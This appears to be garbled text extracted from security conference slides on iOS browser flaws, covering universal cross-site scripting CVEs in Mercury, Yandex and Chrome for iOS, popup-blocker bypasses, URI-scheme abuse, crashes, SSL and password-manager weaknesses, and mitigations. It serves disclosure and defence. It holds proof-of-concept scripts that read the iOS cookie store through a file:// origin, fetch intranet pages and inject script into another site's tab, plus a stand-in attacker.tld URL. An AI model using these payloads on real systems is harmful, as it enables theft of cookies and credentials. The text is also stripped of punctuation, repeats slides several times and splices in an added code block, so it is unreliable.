UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use WKWebView, UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:

Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com/…"] → nil for a string NSURL cannot parse
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com/…"), NULL) → NULL for the same reason
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain rendered as HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream rendered as HTML
• application/other with a filename ending in .html

JS without Same-Origin Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
  alert(x.responseText);
}
</script>

<script>x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText);</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com"><iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes
• Native (WebKit)
• Application (bolted-on)
• Bridge (internal)
• Registered (external)
• scheme://download/https://secure.tld/victimdata vs scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://% http://%5 http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript with privileges of the top frame → passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
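An added example, not code from the slides or from any browser they cover: the save and fill decisions of a browser password manager written against the weaknesses listed above (saving for another domain, filling into subframes, ignoring the scheme), with the hostname-only filler kept beside the strict one so the difference shows on sample URLs. bank.example, attacker.example and the credential are constructed.

```javascript
// Added example, not code from the slides or from any browser they discuss.
// Hostnames and the stored secret below are constructed.

// Save: the entry is keyed on the origin of the top-level document that
// submitted the form, never on a host or URL that page content reports, so
// a page cannot have a password stored for a domain other than its own.
// Returns the stored entry so callers can see which origin it was bound to.
function saveCredential(vault, topFrameUrl, user, secret) {
  const origin = new URL(topFrameUrl).origin; // scheme + host + port
  const entry = { origin, user, secret };
  vault.push(entry);
  return entry;
}

// Weak fill: matches on hostname alone, so http://bank.example, or any frame
// that reports that hostname, receives the credential saved on https://.
function fillHostnameOnly(vault, frameUrl) {
  const host = new URL(frameUrl).hostname;
  return vault.filter(c => new URL(c.origin).hostname === host);
}

// Strict fill: the full origin must match and the requesting document must be
// the top frame. A downgrade to http:// never receives the https:// credential,
// and a subframe receives nothing even on the right host.
function fillStrict(vault, frameUrl, isTopFrame) {
  if (!isTopFrame) return [];
  let origin;
  try { origin = new URL(frameUrl).origin; } catch (e) { return []; }
  return vault.filter(c => c.origin === origin);
}

// One credential saved on the https login page, then fill requests from the
// legitimate page, an http downgrade of the same host, a subframe on the right
// host and a look-alike host. Returns, per request, how many credentials each
// filler would hand out.
function compareFillers() {
  const vault = [];
  saveCredential(vault, 'https://bank.example/login', 'alice', 'constructed-secret');
  const requests = [
    { url: 'https://bank.example/login', top: true },
    { url: 'http://bank.example/login', top: true },
    { url: 'https://bank.example/login', top: false },
    { url: 'https://bank.example.attacker.example/login', top: true },
  ];
  return requests.map(r => ({
    url: r.url,
    top: r.top,
    hostnameOnly: fillHostnameOnly(vault, r.url).length,
    strict: fillStrict(vault, r.url, r.top).length,
  }));
}
```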
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?

lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
